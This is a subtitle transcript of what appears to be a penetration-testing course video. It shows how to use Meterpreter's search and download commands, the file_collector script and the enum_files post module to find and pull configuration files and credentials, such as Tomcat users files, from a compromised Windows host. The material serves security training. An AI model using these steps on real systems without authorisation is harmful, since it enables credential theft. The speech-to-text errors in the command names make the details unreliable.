1
00:00:00,580 --> 00:00:09,160
Information leakage is one of the largest threats that corporations face, and much of it can be prevented

2
00:00:09,160 --> 00:00:13,030
by educating users to properly secure their data.

3
00:00:15,010 --> 00:00:23,950
Users being users and more likely human, however, will frequently save data to their local workstations

4
00:00:23,950 --> 00:00:28,630
instead of on the corporate servers where there's a whole lot greater control and security.

5
00:00:30,250 --> 00:00:38,530
Mature Metropia happens to have a search function that will, by default, scour all drives of the compromised

6
00:00:38,530 --> 00:00:42,130
computer looking for files of your choosing.

7
00:00:43,670 --> 00:00:45,080
So besides the search command.

8
00:00:46,050 --> 00:00:55,110
There are also two other options, an interpreter script called file collector and a post module called

9
00:00:55,500 --> 00:00:56,580
Enum Files.

10
00:00:57,580 --> 00:01:01,990
All these options can help you download files from the target.

11
00:01:03,180 --> 00:01:06,170
And you can choose any of them according to your needs.

12
00:01:08,070 --> 00:01:13,920
So after you him interpretor shell on the machine, you can search for any file on the target.

13
00:01:15,300 --> 00:01:19,080
Now, surely you shouldn't just blindly search for anything.

14
00:01:20,230 --> 00:01:27,390
You can look for configuration files that contains passwords and keys and et cetera, et cetera.

15
00:01:28,740 --> 00:01:35,670
Also, if you compromised an administrative machine, you can look for some additional network topology,

16
00:01:35,670 --> 00:01:39,140
information, network configuration, et cetera, et cetera.

17
00:01:40,140 --> 00:01:42,870
But anyway, the search command is very simple.

18
00:01:44,020 --> 00:01:45,520
Type search F.

19
00:01:46,770 --> 00:01:51,000
And then the filename that you want to find, windows dot any.

20
00:01:53,010 --> 00:01:54,810
OK, so the result has two files.

21
00:01:56,080 --> 00:02:00,190
If this is a standard text file, you can just view its content.

22
00:02:01,390 --> 00:02:03,100
Cat C..

23
00:02:04,210 --> 00:02:04,960
Windows.

24
00:02:05,810 --> 00:02:07,430
When that any.

25
00:02:10,500 --> 00:02:13,350
And another query with the search command.

26
00:02:14,620 --> 00:02:17,380
To look for a Tomcat users file.

27
00:02:18,690 --> 00:02:20,010
Serge F..

28
00:02:21,460 --> 00:02:23,200
Tomcat users.

29
00:02:26,520 --> 00:02:27,810
And here are the results.

30
00:02:29,480 --> 00:02:33,950
Now, you can also perform your search on a specific directory.

31
00:02:35,020 --> 00:02:42,520
All you need to do is just add the D parameter and and the folder name D c.

32
00:02:43,920 --> 00:02:45,180
Manage engine.

33
00:02:47,760 --> 00:02:52,680
And then after you find what you're looking for, you already know that you can download this file using

34
00:02:52,680 --> 00:02:54,450
the download command.

35
00:03:05,420 --> 00:03:09,140
And that's it, I just downloaded the Tomcat users file.

36
00:03:11,460 --> 00:03:15,150
OK, so here is the file in my local storage.

37
00:03:16,290 --> 00:03:18,170
So I can tend to that later.

38
00:03:19,570 --> 00:03:24,850
But I want to show you another option, and that's to use the file collector script.

39
00:03:27,700 --> 00:03:29,650
And this is the help menu for the script.

40
00:03:30,900 --> 00:03:37,650
And the best feature of this script is that you can provide a list and then it can search and then download

41
00:03:37,650 --> 00:03:38,190
that list.

42
00:03:39,430 --> 00:03:41,620
And the parameters are very clear.

43
00:03:42,780 --> 00:03:45,360
So I'm going to use the script with these parameters.

44
00:03:46,730 --> 00:03:48,470
And hit enter.

45
00:03:51,350 --> 00:03:51,800
Now.

46
00:03:52,780 --> 00:03:59,980
I think the script is probably obsolete, so it doesn't work in my case, but the usage is like that

47
00:03:59,980 --> 00:04:00,460
and.

48
00:04:01,600 --> 00:04:03,940
You probably can run it in your environment.

49
00:04:05,360 --> 00:04:10,400
Now, you also have a post module that will do what this script does.

50
00:04:11,440 --> 00:04:12,820
So let's look at it here.

51
00:04:13,500 --> 00:04:16,870
The information for Inam files post module.

52
00:04:20,240 --> 00:04:27,110
And it also has the same search command for me, I prefer to use a search command.

53
00:04:28,520 --> 00:04:30,490
But it's always better to know alternatives.

54
00:04:31,700 --> 00:04:34,010
OK, run post.

55
00:04:35,050 --> 00:04:36,940
Windows Gather.

56
00:04:38,160 --> 00:04:39,690
Enum files.

57
00:04:41,330 --> 00:04:41,900
Then.

58
00:04:43,150 --> 00:04:47,800
File globs equals Tomcat.

59
00:04:48,810 --> 00:04:52,560
That XML to look for files like that.

60
00:04:53,660 --> 00:05:05,990
And search from C colon backslash, backslash to start the search from the C root directories windows.

61
00:05:07,990 --> 00:05:09,160
And then the search runs.

62
00:05:10,090 --> 00:05:13,180
And the post module also downloads the found files.

63
00:05:14,290 --> 00:05:16,090
So why don't we check the files?

64
00:05:18,480 --> 00:05:20,610
We'll copy the first file path.

65
00:05:22,130 --> 00:05:29,300
And go to the next time I typically use Sublime to open files that you can use another text editor to

66
00:05:29,300 --> 00:05:30,530
open files does matter.

67
00:05:31,810 --> 00:05:32,860
Oh, look at that.

68
00:05:32,890 --> 00:05:33,910
Nothing in this file.

69
00:05:36,230 --> 00:05:37,600
OK, so I'll copy another one.

70
00:05:41,790 --> 00:05:42,960
Open it with Sublime.

71
00:05:44,850 --> 00:05:48,270
There we are, finally, you get some credentials.